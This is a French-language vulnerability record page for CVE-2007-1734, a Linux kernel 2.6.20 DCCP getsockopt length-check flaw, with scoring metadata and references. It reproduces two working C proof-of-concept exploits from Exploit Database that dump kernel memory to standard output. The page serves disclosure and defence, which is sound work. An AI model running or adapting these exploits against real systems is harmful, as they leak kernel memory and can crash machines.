CVE-2007-1734 : Détail

CVE-2007-1734

0.21%V4
Local
2007-03-28
20h00 +00:00
2018-10-16
12h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 3587

Date de publication : 2007-03-26 22h00 +00:00
Auteur : Robert Swiecki
EDB Vérifié : Yes

/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw which may allow local users to steal data from the kernel memory. Vulnerable Systems: Linux Kernel Versions: >= 2.6.20 with DCCP support enabled. Kernel versions <2.6.20 lack DCCP_SOCKOPT_SEND_CSCOV/DCCP_SOCKOPT_RECV_CSCOV optnames for getsockopt() call with SOL_DCCP level, which are used in the delivered POC code. Author: Robert Swiecki http://www.swiecki.net robert@swiecki.net Details: The flaw exists in do_dccp_getsockopt() function in net/dccp/proto.c file. ----------------------- static int do_dccp_getsockopt(struct sock *sk, int level, int optname, char __user *optval, int __user *optlen) ... if (get_user(len, optlen)) return -EFAULT; if (len < sizeof(int)) return -EINVAL; ... ----------------------- The above code doesn't check `len' variable for negative values. Because of cast typing (len < sizeof(int)) is always true for `len' values less than 0. After that copy_to_user() procedure is called: ----------------------- if (put_user(len, optlen) || copy_to_user(optval, &val, len)) return -EFAULT; ----------------------- What happens next depends greatly on the cpu architecture in-use - each cpu architecture has its own copy_to_user() implementation. On the IA-32 the code below ... ----------------------- unsigned long copy_to_user(void __user *to, const void *from, unsigned long n) { BUG_ON((long) n < 0); ----------------------- ... will prevent explotation, but kernel will oops due to invalid opcode in BUG_ON(). On some other architectures (e.g. x86-64) kernel-space data will be copied to the user supplied buffer until end-of-kernel space (pagefault in kernel-mode occurs) is reached. POC: ----------------------- */ #include <netinet/in.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <sys/mman.h> #include <linux/net.h> #define BUFSIZE 0x10000000 int main(int argc, char *argv[]) { void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (!mem) { printf("Cannot allocate mem\n"); return 1; } /* SOCK_DCCP, IPPROTO_DCCP */ int s = socket(PF_INET, 6, 33); if (s == -1) { fprintf(stderr, "socket failure!\n"); return 1; } int len = -1; /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ int x = getsockopt(s, 269, 11, mem, &len); if (x == -1) perror("SETSOCKOPT"); else printf("SUCCESS\n"); write(1, mem, BUFSIZE); return 0; } //----------------------- //make poc; ./poc | strings //----------------------- // milw0rm.com [2007-03-27]
Exploit Database EDB-ID : 3595

Date de publication : 2007-03-27 22h00 +00:00
Auteur : Robert Swiecki
EDB Vérifié : Yes

#include <netinet/in.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <sys/mman.h> #include <linux/net.h> #define BUFSIZE 0x10000000 int main(int argc, char *argv[]) { void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (mem == (void*)-1) { printf("Alloc failed\n"); return -1; } /* SOCK_DCCP, IPPROTO_DCCP */ int s = socket(PF_INET, 6, 33); if (s == -1) { fprintf(stderr, "socket failure!\n"); return 1; } /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ int len = BUFSIZE; int x = getsockopt(s, 269, 11, mem, &len); if (x == -1) perror("SETSOCKOPT"); else printf("SUCCESS\n"); write(1, mem, BUFSIZE); return 0; } // milw0rm.com [2007-03-28]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.20

Linux>>Linux_kernel >> Version 2.6.20.1

Linux>>Linux_kernel >> Version 2.6.20.2

Références

http://securityreason.com/securityalert/2511
Tags : third-party-advisory, x_refsource_SREASON
http://www.securitytracker.com/id?1017820
Tags : vdb-entry, x_refsource_SECTRACK